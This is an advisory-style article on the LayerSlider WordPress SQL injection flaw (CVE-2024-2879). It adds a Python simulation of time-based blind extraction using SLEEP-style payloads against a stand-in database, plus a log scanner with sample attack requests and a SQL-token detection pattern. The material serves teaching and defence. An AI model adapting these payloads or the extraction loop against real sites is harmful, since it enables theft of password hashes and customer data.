A critical vulnerability has been discovered in the widely used LayerSlider WordPress plugin, putting more than a million websites at risk of data theft. Tracked as CVE-2024-2879, the flaw is an SQL injection that lets an attacker with no account on the site query the WordPress database directly and extract sensitive data from it.
Vulnerability Details:
- CVE ID: CVE-2024-2879
- CVSS Score: 9.8 (Critical)
- Affected Software: LayerSlider WordPress plugin
- Vulnerability Type: Unauthenticated SQL Injection (time-based blind)
- Impact: Data theft from the database, including password hashes and customer information
Incident Overview:
Security researcher Amr Awad, during Wordfence’s Bug Bounty Extravaganza, found that the plugin’s ls_get_popup_markup() function did not properly sanitize its ‘id’ parameter before the value reached a database query. Because the query’s output is never returned to the caller, the flaw is exploited as a time-based blind SQL injection: the attacker appends a condition that makes the database pause (for example with SLEEP()) only when a guess about the stored data is correct, and reads the answer from how long the server takes to respond. Each request leaks roughly one bit, so recovering a password hash takes a few hundred requests, but the method needs no account, raises no error messages, and is easy to automate.
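To make the mechanism concrete, the following is an added example written for this page; it is not the plugin’s code and not the exploit from the Wordfence report. It simulates a popup lookup that splices the ‘id’ parameter into SQL, the hardened form that casts and binds it, and a timing oracle that recovers a username one character at a time. The popups/wp_users tables, their contents, and the registered sleep() function are constructed stand-ins (MySQL would use SLEEP() directly); the real plugin’s query differs.

```python
import sqlite3
import time

DELAY = 0.1  # seconds the injected branch sleeps; stands in for MySQL's SLEEP()


def make_db():
    """Constructed stand-in for a WordPress database: one popup, one user."""
    con = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so a MySQL-style payload can be simulated.
    con.create_function("sleep", 1, lambda seconds: time.sleep(seconds) or 0)
    con.execute("CREATE TABLE popups (id INTEGER PRIMARY KEY, markup TEXT)")
    con.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
    con.execute("INSERT INTO popups VALUES (1, '<div class=\"ls-popup\">hello</div>')")
    con.execute("INSERT INTO wp_users VALUES (1, 'admin', '$P$B-constructed-hash')")
    return con


def vulnerable_popup_markup(con, id_param):
    """Hypothetical vulnerable lookup: the request parameter is spliced into the SQL."""
    sql = "SELECT markup FROM popups WHERE id = " + str(id_param)
    return con.execute(sql).fetchone()


def hardened_popup_markup(con, id_param):
    """Hardened lookup: reject anything that is not an integer, then bind the value."""
    try:
        popup_id = int(id_param)
    except (TypeError, ValueError):
        return None
    return con.execute("SELECT markup FROM popups WHERE id = ?", (popup_id,)).fetchone()


def timing_oracle(fetch, condition):
    """Ask the server one yes/no question; 'yes' is signalled by a delayed response."""
    payload = f"1 AND (SELECT CASE WHEN {condition} THEN sleep({DELAY}) ELSE 0 END)"
    start = time.perf_counter()
    fetch(payload)  # the return value is irrelevant; only the elapsed time carries information
    return time.perf_counter() - start > DELAY / 2


def search_int(ask, lo, hi):
    """Binary-search an integer x in [lo, hi] given ask(n) == (x > n)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_user_login(fetch, user_id=1, max_len=60):
    """Recover wp_users.user_login one character at a time through the timing oracle."""
    length = search_int(
        lambda n: timing_oracle(fetch, f"(SELECT length(user_login) FROM wp_users WHERE ID={user_id}) > {n}"),
        0, max_len)
    chars = []
    for pos in range(1, length + 1):
        # unicode()/substr() are SQLite's names; MySQL would use ASCII()/SUBSTRING()
        code = search_int(
            lambda n: timing_oracle(fetch, f"(SELECT unicode(substr(user_login, {pos}, 1)) FROM wp_users WHERE ID={user_id}) > {n}"),
            32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", extract_user_login(lambda p: vulnerable_popup_markup(db, p)))
    print("hardened:  ", repr(extract_user_login(lambda p: hardened_popup_markup(db, p))))
```

Against the vulnerable lookup the oracle recovers the username in about forty requests, roughly half of which sleep; against the hardened lookup every payload fails the int() cast, no request ever delays, and the extraction returns an empty string. The binding alone would also have closed the hole; the cast is there because a popup id has no legitimate non-integer form, and rejecting early keeps bad input away from the database entirely.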
Affected Population:
The LayerSlider plugin, with over a million active installations, is widely used on WordPress sites, including commercial sites that store customer data. Versions 7.9.11 through 7.10.0 are affected; the fix shipped in 7.10.1.
Mitigation Recommendations:
- Immediate Update: Upgrade LayerSlider to version 7.10.1 or later, which fixes the vulnerability. LayerSlider is a commercial plugin distributed outside the WordPress.org repository, so the update may not appear through the normal plugin updater; check the installed version on each site rather than assuming it updated itself.
- Regular Maintenance: Keep WordPress core, plugins, and themes up to date.
- Enhance Security Posture: Put a Web Application Firewall (WAF) in front of the site to detect and block SQL injection and other web attacks. Treat the WAF as defence in depth rather than a fix: signatures can be evaded, and a time-based blind injection sends ordinary-looking requests that differ from legitimate ones only in a crafted parameter value and a slow response. Review web server logs for requests to the vulnerable function with non-numeric ‘id’ values; if any are found, assume the database may have been read and reset user passwords.
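The following detection example is added here and is not from the original page or from Wordfence. It scans constructed Apache/nginx combined-format access-log lines for requests to the popup function whose ‘id’ is not a plain integer, and classifies the ones carrying SQL tokens. The URL form /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id=... is an assumption about how the function is reached; the function name comes from the report, the action name and parameter position should be checked against the site’s own traffic.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache/nginx combined-format lines; not real traffic. The admin-ajax
# action name and the 'id' query parameter are assumptions about the endpoint.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Apr/2024:10:12:01 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id=12 HTTP/1.1" 200 1832 "-" "Mozilla/5.0"
198.51.100.23 - - [01/Apr/2024:10:12:09 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id=12%20AND%20SLEEP(5) HTTP/1.1" 200 0 "-" "python-requests/2.31"
198.51.100.23 - - [01/Apr/2024:10:12:15 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id=12%20AND%20(SELECT%20CASE%20WHEN%20ASCII(SUBSTRING(user_pass,1,1))%3E64%20THEN%20SLEEP(3)%20ELSE%200%20END%20FROM%20wp_users%20LIMIT%201) HTTP/1.1" 200 0 "-" "python-requests/2.31"
203.0.113.9 - - [01/Apr/2024:10:13:40 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat&id=abc HTTP/1.1" 200 60 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Apr/2024:10:14:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 60 "-" "Mozilla/5.0"
"""

# ip, timestamp, method, request target, status, size from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Tokens that have no business in a numeric popup id.
SQLI_HINT = re.compile(r"""\b(sleep|benchmark|select|union|case|when|and|or)\b|--|/\*|['";#]""", re.I)


def classify_id(value):
    """A popup id should be a plain integer; return None when it is, else a verdict."""
    if re.fullmatch(r"\d+", value):
        return None
    if SQLI_HINT.search(value):
        return "sqli-pattern"
    return "non-numeric"


def scan_log(text, action="ls_get_popup_markup"):
    """Return one finding per request to the popup endpoint whose id is not an integer."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)  # decodes %XX
        if action not in qs.get("action", []):
            continue
        for raw_id in qs.get("id", [""]):
            verdict = classify_id(raw_id)
            if verdict:
                findings.append({"ip": m["ip"], "ts": m["ts"], "verdict": verdict,
                                 "status": m["status"], "id": raw_id[:80]})
    return findings


def sources(findings):
    """Count findings per client IP, most active first."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(counts.items(), key=lambda kv: -kv[1])


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
    print(sources(scan_log(SAMPLE_LOG)))
```

Two limitations are worth keeping in mind. Access logs record only the query string, so requests that send the parameters in a POST body to admin-ajax.php are invisible here and need the WAF’s own log or request-body logging. And a blind injection returns HTTP 200 with a normal-sized body, so status codes will not help; the other usable signal is request duration, which many servers can add to the log format and which clusters around the attacker’s chosen SLEEP() value.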
Conclusion:
The discovery of CVE-2024-2879 underscores the critical importance of maintaining up-to-date software to safeguard against potential data breaches. WordPress site administrators are advised to act promptly to update the affected plugin and review security practices to protect sensitive information.